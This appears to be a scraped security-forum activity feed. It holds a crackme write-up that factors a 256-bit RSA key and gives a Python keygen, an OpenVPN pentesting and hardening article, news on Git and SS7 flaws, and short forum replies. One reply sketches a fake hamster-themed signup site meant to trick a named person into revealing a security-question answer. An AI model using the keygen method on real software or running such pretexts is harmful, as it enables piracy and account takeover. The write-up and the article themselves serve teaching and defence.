Open up the target “CryptoChallenge1.exe” and Type any Name/Serial, I’ve typed my name, and for the serial I had to make many tries before it gave me that message “SERiAL STATUS: UNREGiSTERED” (the target checks for the serial’s length). Now we analyze our target to see if it’s packed/protected. As you can see, the analysis shows it was compiled using MASM32 / TASM32. But the crypto analysis using KANAL shows the target has some crypto inside (MD5 and BigLib: an assembly bignum library) Alright, now that we know what we’re dealing with, we will use IDA to extract these cryptos’ signatures from our target. To do that you should have the sig file “RE-SIGS” (download link in the bottom). PS: Before opening IDA, you should copy the signature file “RE-SIGS” in the folder IDAsig. Open the target in IDA and go to menu View > Open subviews > Signatures or just press Shift+F5. A list of applied library modules shows up. To apply a new signature, you can either press “Ins” or right-click > Apply new signatures. A new window will show up. Choose RESIGS and click OK. You will be able to see the changes in the functions window. 33 functions were applied, which means it has found the crypto algorithms and libraries and has given them their real names. Now we will export this result so that we can use it in our debugger. To do that, go to File > Produce file > Create MAP file as shown below: Save your file in a place you can remember, and leave the MAP file options as they are, as shown below (just click OK). Now that we have our map file, let’s debug. PS: Before opening OllyDBG you should put the plugin “GODUP Plugin” in the plugins section of the debugger you’re using, because that’s what we will be using to import our map file. Fire up the target file into OllyDbg and go to: Plugins > GODUP Plugin > Map Loader > Load labels And choose the map file you’ve saved before. 
The code is easy and simple: there are the initial APIs that load the PE file and after that there is GetDlgItemTextA (gets a text from an editbox/textbox and puts it in a buffer). Let's put a breakpoint on that API and see what it really gets (simply click on address 0040107A and press F2). The tracing shows that the API is used to get the typed name. The target then checks if a name was typed, otherwise it shows a text saying "NAME STATUS : NO NAME"; after that it checks if the length of the name is longer than 15 (CMP EAX,0F) or shorter than 3 (CMP EAX,3). If the name is longer than 3 and shorter than 15, it jumps to another GetDlgItemTextA API that gets the typed serial and does the same checks as for the name, except that the length must not be longer than 64 (CMP EAX,40) and not shorter than 63 (CMP EAX,3F). If everything is good, it will jump to address 0x40115A, which calls another address: CALL 0x401189. What might that address (00401189) contain? Let's go check it out, shall we! The address sends us to the challenge's RSA routine shown below:

The tracing of that function shows that lstrlenA at 0x40118E is used to get the length of our name, and that length is then moved to EBX. The three following calls (MD5Init, MD5Update and MD5Final) generate the MD5 hash of the name. That hash is then converted to hexadecimal using HexEncode at 0x4011B2 and is put at address 0x407847. The calls at 0x4011B9, 0x4011C5, 0x4011D1 and 0x4011DD reference BigCreate. This API is used by BigLib to create a bignumber and initialize it with the value InitValue. The next three calls (0x4011F4, 0x401206 and 0x401218) reference BigIn, which is used to fill the given bignumber with the null-terminated string in the given base (16 in this case). Here is an example of that function:

    PUSH output // our bignumber buffer
    PUSH 16     // base
    PUSH input  // (typed serial, public modulus n, public exponent e)
    CALL _BigIn

Now we have:
0x4083F8 = Serial in bignum.
0x408400 = Public Modulus (N) in bignum.
0x408404 = Public Exponent (E) in bignum.
N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D
E = 10001

Next, the call at 0x401235 is a reference to the function BigPowMod, which is the encryption formula, used as follows: 0x4083FC = 0x4083F8 ^ 0x408404 mod 0x408400, or C = Serial^E mod N. After that comes a call at 0x401247 to the BigOut function. It is the opposite of BigIn: it converts from bignumber to a base-16 string. The result is put in 0x407C47. Next comes the algorithm from 0x40124C to 0x40126E, which has a loop that compares each character from 0x407847 (MD5 hash of our name) with each character from 0x407C47 (our serial). It is easy to make it accept any serial just by patching the JNZ at 0x401266 into NOPs. But that's not ideal. The JNZ at 0x401266 inside the loop checks if two characters are equal; if not, it jumps to address 0x401290, which has a SetDlgItemTextA that outputs "SERiAL STATUS: UNREGiSTERED", otherwise it doesn't jump and shows "SERiAL STATUS: REGiSTERED". After each SetDlgItemTextA call, there are two calls (CALL 0x4012B0 and CALL 0x4012DE). 0x4012B0 is a function that has three calls to RtlZeroMemory, which is used to clear the data. 0x4012AA is a function that has four calls which reference BigDestroy. It destroys the bignums that were created by BigCreate.

This is what we know so far:
The Name must be longer than 3 and shorter than 15 characters.
The Serial must contain either 63 or 64 characters.
N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D
E = 10001
The target compares the MD5 hash of the Name with the result of the BigPowMod (C = Serial^E mod N).
The public modulus N is 256 bits.
The serial should be in base 16.

Alright, now we need to reverse C = Serial^E mod N into M = C^D mod N (remember RSA's encryption/decryption formulas!) so that we can get a valid serial. For that we need to factor N to get the private exponent D.

Load up RSA-Tool and copy N into the Modulus N textbox (to get the key size click Exact size), click Factor N and wait until it finds P and Q. This will take a while depending on the computer you're using (it took 1h on my computer). Once the tool finishes factoring, you will see the P and Q textboxes filled:
P = 960A589F7B9AA6E2FBF05A5F5E507465
Q = E5109FD956BC44F85A6B0CF071A22DD9
Now click "Calc. D.":
D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57C1

Now that we have our private exponent, let's calculate our valid serial. We know that the encryption formula is C = Serial ^ E mod N, and C must be equal to MD5(NAME), which means C = MD5(NAME). So the decryption formula must be: Serial = C ^ D mod N. Let's try that out:
NAME = Jamal Chahir
C = MD5(NAME) = 4D945493477571DE563E281CA4145EB9
D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57C1
N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D
Serial = C ^ D mod N
The calculation in TiBiNuCa gives us the following result, as you can see below:
20F9C3683546ECDBF4F4469525B1DE915056F81E6708F78B7210858E40D25416
Trying that on the challenge gives us the right message.

Conclusion
In this article, I have shown you how the RSA cryptosystem works and how to reverse it. I hope all of this was clear enough and that you've learned something new from it.

Download links:
IDA: https://www.hex-rays.com/products/ida
OllyDBG: OllyDbg v1.10
PEiD: PEiD Download - Softpedia
RSA-Tool: https://tuts4you.com/download.php?view.455
RE-SIGS: https://tuts4you.com/download.php?view.3407
GODUP: https://tuts4you.com/download.php?view.54
TiBiNuCa: https://www.dropbox.com/s/4dipnjrlggrpz1w/TiBiNuCa.rar?dl=0
Target: https://www.dropbox.com/s/4va2kyqyd729hjd/CryptoChallenge1.rar?dl=0
Sources: en.wikipedia.org/wiki/RSA_(cryptosystem)
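The derivation above, written out as an added example (not the article's code or RSA-Tool's): it checks that the recovered P and Q really multiply back to N, derives D from them, computes Serial = MD5(name)^D mod N, and then re-runs the target's own check Serial^E mod N == MD5(name). The constants are the article's; the function names and the inclusive 3..15 name-length bounds are assumptions. The lesson for anyone designing a licensing scheme is that a 256-bit modulus is factored in about an hour on a desktop, after which the private key falls out with one modular inverse.

```python
import hashlib

# Public key of the challenge and the factors RSA-Tool recovered, all taken
# from the article above.
N = int("8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D", 16)
E = 0x10001
P = int("960A589F7B9AA6E2FBF05A5F5E507465", 16)
Q = int("E5109FD956BC44F85A6B0CF071A22DD9", 16)


def factorization_is_valid() -> bool:
    """The factoring step only helps if P*Q really is N; check before trusting it."""
    return P * Q == N


def private_exponent() -> int:
    """D = E^-1 mod (P-1)(Q-1), the quantity RSA-Tool's 'Calc. D' button produces."""
    return pow(E, -1, (P - 1) * (Q - 1))  # modular inverse, Python 3.8+


def md5_as_int(name: str) -> int:
    """C = MD5(name) as a number, mirroring MD5Init/Update/Final + HexEncode + BigIn."""
    return int.from_bytes(hashlib.md5(name.encode("ascii")).digest(), "big")


def make_serial(name: str) -> str:
    """Serial = C^D mod N as 64 uppercase hex digits (the length the target accepts).
    The 3..15 name-length bounds follow the article; inclusive ends are an assumption."""
    if not 3 <= len(name) <= 15:
        raise ValueError("name length must be between 3 and 15 characters")
    return format(pow(md5_as_int(name), private_exponent(), N), "064X")


def check_serial(name: str, serial_hex: str) -> bool:
    """Re-implements the target's check: Serial^E mod N must equal MD5(name)."""
    if len(serial_hex) not in (63, 64):  # the CMP EAX,40 / CMP EAX,3F length checks
        return False
    return pow(int(serial_hex, 16), E, N) == md5_as_int(name)


if __name__ == "__main__":
    name = "Jamal Chahir"  # the name used in the article
    serial = make_serial(name)
    print(f"{name} -> {serial}  valid={check_serial(name, serial)}")
```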
-
It wouldn't really be OK. Suppose I am "selling a website" and I haven't managed to sell it within 2 weeks; many posts have already piled up and mine is no longer visible. Currently "UP" is used; if this were to happen the topic would be forgotten, plus the guys would get the idea of making accounts for com: e.g. my account is Grigore, I post something and after 2 weeks I make an account Adrian and post "Is the offer still available?" That would be silly.
-
How could you find out the hamster's name with the help of a backdoor? It's not as if he has the hamster's name somewhere on his PC, or if it is used as a login it has no password:
-
GOODBYE privacy! The SRI will be able to check any computer!
Aerosol replied to wirtz's topic in Stiri securitate
As was also discussed in https://rstforums.com/forum/94054-legea-securit-ii-cibernetice-votat-de-ale-i-sri-acces-la-calculatoarele-perso.rst <- there is nothing new, nothing has changed and nothing is going to change, this is just a formality... it's just something "official"; this has been happening for a long time. -
Saattaa puolustusliitto kotityö tiedonanto lämpimästi
Aerosol replied to MArndell's topic in Cosul de gunoi
Come on, don't you notice it's just a spam bot? -
As @iam60 also said, if he has a hamster, a rabbit, a dog and a cat, how do you know it's the hamster's name? One option would be to ask 3 questions. -Mother's name -What is your favourite animal (among the animals you have) -Your animal's name (here it's also down to luck... ) One option would be something targeted at Viorel's hamster, with the site being about hamsters... as I presented above. And at registration you put: - What is your hamster's name: - How long have you had it? - What does it like to eat (you can't ask just one question because it would look suspicious)
-
http://www.000webhost.com/ http://www.freewebhostingarea.com/ http://www.weebly.com/features/#!/free-web-hosting https://byethost.com/free-web-hosting http://5gbfree.com/ http://www.freehostia.com/index2.html http://haphost.com/ https://www.x-o.ro/ https://www.freehosting.com/ The thing is, you want it both free and good; if you don't want to pay, stop being fussy...
-
Bro, for 25 years (since the revolution) nothing has changed in Romania and nothing will change; the tricks are already being pulled behind the "suckers'" backs. Rest assured that nobody is going to ask your opinion or whether "it seems fair to you". Understand that it's the same everywhere (i.e. communism). It's like taking a bottle of Coke and putting a "Pepsi" label on it; the same thing happened with the revolution. Still, let's not get into such discussions over a news item like this...
-
Introduction
A VPN (Virtual Private Network) enables connections between clients and servers from multiple different internal networks across a public network (like the Internet) as if the nodes were located in the same private network. Since the communication is transferred across the public network, it must be properly encrypted to prevent eavesdropping. When a user is connected to the VPN, he/she can access the extended network services the same way as if located within its private network. There are two types of VPNs: the remote-access VPN, used to connect a device to a network, and the site-to-site VPN, used when connecting two networks together. A VPN can be used for multiple different scenarios, like allowing employees to securely access the company's internal network even when outside the office (remote-access VPN), connecting two remote offices together into one internal private network (site-to-site VPN), etc.

There are different implementations of the VPN protocols, including the ones listed below (summarized after [1]):
Internet Protocol Security (IPsec): a widely used VPN implementation that uses IPv4 and operates on layer 2, where the packet is encapsulated into an IPsec header and sent to its endpoint.
Transport Layer Security (SSL/TLS): another widely used VPN implementation that's most often associated with OpenVPN, which we'll take a look at in this article. OpenVPN is an SSL-based VPN that uses SSL certificates to encrypt the data in transit.
Datagram Transport Layer Security (DTLS)
Microsoft Point-to-Point Encryption (MPPE)
Microsoft Secure Socket Tunneling Protocol (SSTP)
Secure Shell (SSH) VPN

Pentesting OpenVPN
Depending on the type of VPN we're checking during our penetration test, there are different procedures that will drive our testing. Regardless of the type of VPN being used, the basic steps to pentest the VPN are the following:

Reconnaissance: the first step is determining which type of VPN we're dealing with in order to plan how to proceed with the attack. We can do that with a simple port scan by using an open-source tool like Nmap or any other tool with port scanning capabilities. The purpose is determining the type of VPN implementation we're dealing with, which is often bound to a default port. Usually the following ports are involved with VPN services: UDP 500 (IPsec), TCP 1723, TCP 443 (SSL VPN) and UDP 1194 (OpenVPN).

Exploitation: this phase is directly influenced by the type of VPN we're dealing with. When testing network-based IPsec VPN, we can rely on the ike-scan program to perform the testing. First, we can identify the VPN product and its version and search for related vulnerabilities online; there are vulnerabilities for different vendors like Cisco or CheckPoint regarding the VPN services that we can use to our advantage. When dealing with SSL VPN, we could theoretically use the tools used for SSL pentesting, and in some cases we can do that, but most tools out there support the TCP protocol only, where UDP isn't supported. One of the most critical vulnerabilities this year has been the Heartbleed vulnerability, which affects the OpenSSL library that OpenVPN is also using. Therefore, if OpenVPN is using a vulnerable version of the OpenSSL library, the service can be exploited by malicious attackers and the whole server can be compromised. This is why we have to take every security precaution in order to protect our network.

Credentials: when the connection with a VPN server is initiated, a client must present a valid passphrase or a certificate to prove that it's authorized to use the server. If the VPN server is only using passphrases, we should instead configure it to use certificates in addition to each of the passphrases to improve security.

I've often seen a VPN server using only user credentials to authenticate to the VPN server; not to mention some of the user passwords were quite simple and easy to guess within a few bruteforcing attempts. That is certainly something we have to keep in mind when conducting a penetration test of the VPN server or when setting up such a server for our own network.

Recommendations for Hardening OpenVPN
To harden OpenVPN security, we have to edit its configuration file, usually passed to the OpenVPN daemon by the --config command-line option. If we use the "ps -ef" command and grep for the OpenVPN processes, we can see where the configuration file is located and view it accordingly.

Table 1: Security configuration options in openvpn.conf

Conclusion
It goes without saying that when a hacker stumbles upon an open VPN port, he will most likely check it for different security holes. Therefore, we have to properly protect our VPN server in order to secure our users and our whole internal network. If an attacker is able to compromise the VPN service, he can get access to our whole network. Some administrators might argue that the VPN service is very secure by itself and needs no additional protection, but such predictions have been proved incorrect in the past. One such vulnerability was found in April 2014, named the Heartbleed vulnerability, which can be used to dump memory from the OpenVPN daemon process. Therefore, if an attacker is able to determine that a VPN service is running on some port, he might be able to dump arbitrary memory from the server or possibly even take control of the server. Once such a vulnerability is discovered, we must patch it as soon as possible, but a properly hardened service should give an attacker as little access to the server as possible. Imagine a new devastating vulnerability being found in OpenVPN/OpenSSL in the future; a secure service running under an unprivileged account might be just what you need to protect yourself from being a victim of a cyber attack.

References
[1] Virtual private network, https://en.wikipedia.org/wiki/Virtual_private_network.
[2] Hardening OpenVPN Security, https://openvpn.net/index.php/open-source/documentation/howto.html#security.
Source
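As an added example (not the article's or the OpenVPN project's own code), a small audit script that reads an OpenVPN server configuration and flags settings that go against the recommendations above: no privilege drop or chroot, no tls-auth/tls-crypt HMAC on the control channel, and password-only client authentication. The directive names are standard OpenVPN ones; the weak and hardened sample configurations are constructed for the example.

```python
from typing import Dict, List


def parse_openvpn_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the argument lists it appears with.
    Lines starting with '#' or ';' are comments, as in openvpn.conf."""
    directives: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        name, *args = line.split()
        directives.setdefault(name, []).append(args)
    return directives


def audit_openvpn_conf(text: str) -> List[str]:
    """Return one finding per weak or missing hardening setting (empty list = ok)."""
    conf = parse_openvpn_conf(text)
    findings: List[str] = []
    # Privilege reduction: 'user'/'group' drop root after start-up and 'chroot'
    # limits what a compromised daemon process can reach on the filesystem.
    for directive in ("user", "group", "chroot"):
        if directive not in conf:
            findings.append(f"missing '{directive}': daemon keeps full root privileges")
    # 'persist-key'/'persist-tun' let the daemon restart after privileges are dropped.
    if "persist-key" not in conf or "persist-tun" not in conf:
        findings.append("missing 'persist-key'/'persist-tun': cannot restart unprivileged")
    # Control-channel HMAC: packets without a valid HMAC are dropped before the
    # TLS handshake, which narrows exposure to TLS-library bugs such as Heartbleed.
    if "tls-auth" not in conf and "tls-crypt" not in conf:
        findings.append("missing 'tls-auth'/'tls-crypt': control channel has no extra HMAC")
    # Password-only clients: this directive removes the client certificate requirement.
    if "client-cert-not-required" in conf:
        findings.append("'client-cert-not-required': clients authenticate by password only")
    return findings


# Constructed sample configurations (not from the article).
WEAK_CONF = """\
port 1194
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
client-cert-not-required
auth-user-pass-verify /etc/openvpn/checkpw.sh via-env
"""

HARDENED_CONF = WEAK_CONF.replace("client-cert-not-required\n", "") + """\
tls-auth ta.key 0
user nobody
group nogroup
chroot /var/empty
persist-key
persist-tun
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_openvpn_conf(conf) or ["no findings"])
```

The hardened sample keeps auth-user-pass-verify, so clients still need a passphrase but now also a certificate, which is the combination the article recommends.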
-
Developers running the open source Git code-repository software and tools, like GitHub, on Mac OS X and Windows computers are strongly recommended to install a security update that patches a major security vulnerability in Git clients that allows an attacker to hijack end-user computers. The critical Git vulnerability affects all versions of the official Git client and all the related software that interacts with Git repositories, including GitHub for Windows and Mac OS X, according to a GitHub advisory published Thursday.

HOW GIT BUG WORKS
The vulnerability allows an attacker to execute remote code on a client's computer when the client software accesses Git repositories. The GitHub engineering team gave a detailed explanation of how attackers might exploit the vulnerability:

PATCH RELEASED
However, the advisory didn't state whether the vulnerability is being or has been exploited in the wild by hackers, but it confirmed that GitHub for Windows and GitHub for Mac are both affected and should be updated as soon as possible.

GITHUB REPOSITORIES ARE SAFE
Developers using GitHub's client for Windows or Mac can download Git version 2.2.1, a maintenance release that includes a security fix for a critical vulnerability; it requires a client update to be fully addressed. The security update also includes new releases with the same security fix for older versions of the Git command-line client. Since GitHub verifies repositories and blocks malicious content during its verification process, repositories on github.com are protected. But other sites hosting repositories do not necessarily provide the same security measures, so all Git users are recommended to upgrade immediately.

DOWNLOAD NOW
Check out the Git version 2.2.1 release for further information on the security fixes. Updated versions of GitHub for Windows are available here and GitHub for Mac are available here for immediate download.

Git is a revision control system, and GitHub is a hosting service for Git repositories; both are widely used to collaborate on open-source projects and for proprietary software that different companies build and maintain.

Source
-
Security researchers have discovered a massive security flaw that could let hackers and cybercriminals listen to private phone calls and read text messages on a potentially vast scale, no matter whether the cellular networks use the latest and most advanced encryption available. The critical flaw lies in the global telecom network known as Signaling System 7, which multiple phone carriers across the world, including AT&T and Verizon, use to route calls, texts and other services to each other. The vulnerability has been discovered by German researchers who will present their findings at a hacker conference in Hamburg later this month.

NUMBER OF SECURITY FLAWS IN SS7
SS7, or Signaling System Number 7, is a protocol suite used by most telecommunications operators throughout the world to communicate with one another when directing calls, texts and Internet data. It allows cell phone carriers to collect location information from cell phone towers and share it with each other. A United States carrier will find its customer no matter which country he or she travels to. According to the security researchers, the outdated infrastructure of SS7 makes it very easy for hackers to attack, as it is loaded with serious security vulnerabilities which can lead to huge invasions of privacy for billions of cellular customers worldwide.

BACKDOOR OPEN FOR HACKERS
So far, the extent of the flaws exploited by hackers has not been revealed, but it is believed that using the flaws hackers can locate users or redirect their calls to themselves or anywhere in the world before forwarding them to the intended recipient, listen to calls as they happen, and record hundreds of encrypted calls and texts at a time for later decryption.

No matter how strong or advanced the encryption the carriers are using (for example, AT&T and Verizon use 3G and 4G networks for calls, messages and texts sent between people within the same network), the use of the old and insecure SS7 for sending data across networks leaves the backdoor open for hackers. Not just this: the use of the SS7 protocol also creates the potential to defraud users and cellular carriers, according to the researchers.

ACLU – STOP USING TELEPHONE SERVICE, BUT WAIT!! IS THAT POSSIBLE?
The American Civil Liberties Union (ACLU) has also warned people against using their handsets in light of the breaches. Soghoian also believes that security agencies, like the United States' NSA and the British security agency GCHQ, could be using these flaws. "Many of the big intelligence agencies probably have teams that do nothing but SS7 research and exploitation. They've likely sat on these things and quietly exploited them," he said. However, the poor security of the SS7 protocol is not hidden from people and is not at all new; just three months ago we reported How a Cell Phone User Can be Secretly Tracked Across the Globe. But in an era where each and every person cares about the privacy and security of their data, things like this really publicize exactly how big this threat is and make many worried about its consequences.

Source